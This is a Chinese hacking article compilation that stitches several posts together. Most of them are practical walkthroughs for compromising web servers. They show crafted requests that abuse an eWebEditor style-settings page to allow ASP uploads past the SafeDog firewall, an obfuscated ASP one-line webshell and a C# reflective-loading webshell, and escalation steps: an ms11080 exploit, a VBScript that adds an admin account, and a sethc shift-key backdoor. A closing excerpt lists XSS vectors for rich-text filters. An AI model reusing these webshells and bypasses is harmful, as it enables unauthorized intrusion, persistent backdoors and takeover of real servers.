以下是小编为大家准备了问题ewebeditor编辑器突破安全狗(共含7篇),欢迎参阅。同时,但愿您也能像本文投稿人“点绛”一样,积极向本站投稿分享好文章。
题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?
1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了,
2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。
当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。
1.问题ewebeditor
2.服务器装有安全狗
下面是我测试的过程:
首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:
01 ' 检测样式表单提交的有效性
02 sStyleName = Trim(Request(“d_name”))
03 sStyleDir = Trim(Request(“d_dir”))
04 sStyleCSS = Trim(Request(“d_css”))
05 sStyleUploadDir = Trim(Request(“d_uploaddir”))
06 sStyleBaseHref = Trim(Request(“d_basehref”))
07 sStyleContentPath = Trim(Request(“d_contentpath”))
08 sStyleWidth = Trim(Request(“d_width”))
09 sStyleHeight = Trim(Request(“d_height”))
10 sStyleMemo = Request(“d_memo”)
11 sStyleImageExt = Request(“d_imageext”)
12 sStyleFlashExt = Request(“d_flashext”)
13 sStyleMediaExt = Request(“d_mediaext”)
14 sStyleRemoteExt = Request(“d_remoteext”)
15 sStyleFileExt = Request(“d_fileext”)
16 sStyleImageSize = Request(“d_imagesize”)
17 sStyleFlashSize = Request(“d_flashsize”)
18 sStyleMediaSize = Request(“d_mediasize”)
19 sStyleRemoteSize = Request(“d_remotesize”)
20 sStyleFileSize = Request(“d_filesize”)
21 sStyleStateFlag = Request(“d_stateflag”)
22 sStyleAutoRemote = Request(“d_autoremote”)
23 sStyleShowBorder = Request(“d_showborder”)
24 sStyleUploadObject = Request(“d_uploadobject”)
25 sStyleAutoDir = Request(“d_autodir”)
26 sStyleDetectFromWord = Request(“d_detectfromword”)
27 sStyleInitMode = Request(“d_initmode”)
28 sStyleBaseUrl = Request(“d_baseurl”)
他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。
当然此处post失效了,所以我抓了下包,得到如下数据
01 www.2cto.com /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50
02
03 POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1
04 Host: xxxx.com
05 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/0101 Firefox/12.0
06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
07 Accept-Language: en-US,en;q=0.5
08 Accept-Encoding: gzip, deflate
09 Connection: keep-alive
10 Referer: www.2cto.com /system/eWebEditor/admin_style.asp?action=styleset&id=50
11 Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK
12 Content-Type: application/x-www-form-urlencoded
13 Content-Length: 740
14 d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
于是使用构造get提交方式:
xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
然后直接访问时,他显示是提交成功了,实际上也米有成功,需要我们先访问:
xxxx.com/system/eWebEditor/admin_style.asp?action=styleset&id=50
然后在在地址栏中输入上边的get提交数据,就会显示成功,
这儿我们可以修改样式了,但是安全狗作怪使得asa、cer和asp;jpg等等的修改都无效,但是aaspsp这样的修改绕过去了安全狗,这儿可能是程序天然给我们的一个绕安全狗的方法吧!程序本身使用的代码有问题,他会替换aaspsp中完整的asp部分为空格使得剩下的部分还是asp,这儿的代码依旧是一个替换函数,就不多说了,前辈们已经写了很多了。就是这样的一个代码写法使得我们天然绕过了安全狗上传asp的文件了,重这里我们也可以得到启发,以后我们绕安全狗是不是也可以使用这样的代码写法去绕过,话不多说,留下余香。
接下来我曾填好了可以传的后缀asp,但是视乎目录有问题,以前默认的目录是uploadfiles这个文件目录,视乎是做了限制,于是我想到了修改上传文件目录,当然你可以仔细看我上边构造的哪个get提交上边的d_uploaddir属性的值是%2F,也就是一个/,于是我传上去的文件在根目录下。
当然这儿已经为我们上传做好了所有铺垫了,我们现在只需要一个可以绕过安全狗的马就ok了。
还记得以前解密一个asp木马的时候,里面有一个后门,当时只是以为那个是一个后门,但是后面有心人测试发现这个后门很是了得可以绕过护卫神,今天我又用它绕过了安全狗。
01 <%
02 codeds=“Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li”
03 execute (decode (codeds) )
04 Function DeCode (Coded)
05 On Error Resume Next
06 For i = 1 To Len (Coded)
07 Curchar = Mid (Coded, i, 1)
08 If Asc (Curchar) = 16 then
09 Curchar = chr (8)
10 Elseif Asc (Curchar) = 24 then
11 Curchar = chr (12)
12 Elseif Asc (Curchar) = 32 then
13 Curchar = chr (18)
14 Else
15 Curchar = chr (Asc (Curchar) -3)
16 End if
17 DeCode = Decode&Curchar
18 Next
19 End Function
20 'response.write(decode(codeds))
21 %>
最后突破成功!上传一句话成功!!!
from:lanu.sinaapp.com/jishuwenzhang/113.html
晚上闲来无事准备提权前几天拿的shell,无奈shell没有了进后台上传shell发先有狗。 aspx不支持。看了一个文章说安全狗“截断解析”无奈还是被拦截,
不说直接上图
截断解析是;x.asp;x.jpg 被拦截所以直接;x.asp 绕过狗思路最重要
在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功,
服务端一句话木马:
<%@ Page Language=“C#” ValidateRequest=“false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
客户端截图:
首先在Shell下把安全狗的安装配置给下来 默认安装路径:
C:Program FilesSafedogServerSafeDogGuardCenter 找到 ProGuardData.ini 下载文件到本地虚拟机
虚拟机安装安全狗 然后文件覆盖一下 打开安全狗就可以看到的鸟....计算机名字和端口的配置信息
接下来...改虚拟机的计算机名字 然后 就可以正常连接了...
,。果断丢御剑。
FCK编辑器拿shell还是比较简单的,直接二次上传。。
拿到shell之后看了一下,权限还是很大的,于是乎准备提权。先看下组件。
wscript.shell被删了。看下脚本探测。一看支持aspx ,果断换马。接着上传了个cmd到C:RECYCLER。。看看能不能执行命令、
可以执行命令。 ww. 但是net user却没回显,应该是net被禁用了、、果断上传ms11080。
成功添加用户。。但是连接的时候却这样
果断试下第二种方法。。把下面代码保存为1.vbs
Set o=CreateObject( “Shell.Users” )
Set z=o.create(“user”)
z.changePassword “12345”,“”
z.setting(“AccountType”)=3
然后以system权限运行,
。会添加一个用户user密码为12345、、
成功执行。。但是还是不行。。
估计是第三方软件阻止了。果断tasklist。。
原来有安全狗。。
试了下远控无果。。
于是准备劫持shift后门、、直接替换sethc。。
连接看看。。5下shift。没看到后门。
于是看了下进程。。发现是、、
果断替换MY_sethc。。5下shift。如图。
果断登录上去加用户。。无果
打开安全狗。。看下,被拦截了。
果断关闭帐号防护。因为net被禁用了,所以直接运行ms11080或1.vbs成功添加用户。如图。
富文本编辑器是一个开放式的HTML内容编辑环境,必须实现文字样式、链接、图片等功能的HTML,所以用户 POST的内容必须含有HTML标签,但是任由用户输入各类HTML标签,会造成一些潜在的恶意脚本攻击,借这类情况正好分析出现XSS的情况,主要针对 IE浏览器.
一.首先是微软建议我们可能造成恶意脚本攻击的标签.
类似如下的
tag:
applet
base
basefont
bgsound
blink
body
embed
frame
frameset
head
html
ilayer
iframe
layer
link
meta
object
style
title
script
-----------------------------------
类似这类
必须删除.
二.针对HTML属性值的协议攻击.
tag:
dynsrc=
href=
lowsrc=
src=
background=
value=
action=
bgsound=
可能利用如下协议:
脚本伪协议
vbscript.:
javascript.:
文件类协议
ms-its:
mhtml:
data:
第三方协议
firefoxurl:
mocha:
livescript.:
---------------------------------
类似这类
如:
必须判断属性的用的啥协议,给个http:就好了.
三.针对普通HTML属性值的编码, 可利用HTML特性将属性值做编码绕过过滤.
&加 ASCII格式
---------------------------------
类似这类
必须判断属性的值&转换成 &
四.css样式style属性问题.
style属性可以和任意字符的标签结合,因此不是
behavior需指定域内也就是绝对路径的HTC文件,危害不大.
expression可以构造不同的全角字符和注释符来扰乱过滤规则.
如:
---------------------------------
类似这类
必须判断style属性的值, :( ~这里正则超级难写,实在不过滤的话,列个白名单,只允许某些值.
五.css样式style属性其他问题.
xxx.com/mozxss.xml#xss)“>
---------------------------------
类似这类
还是判断协议头之类吧.
六.针对普通style属性值的编码, 可利用HTML特性将属性值做编码绕过过滤.
转义字符 加 16进制格式
---------------------------------
类似这类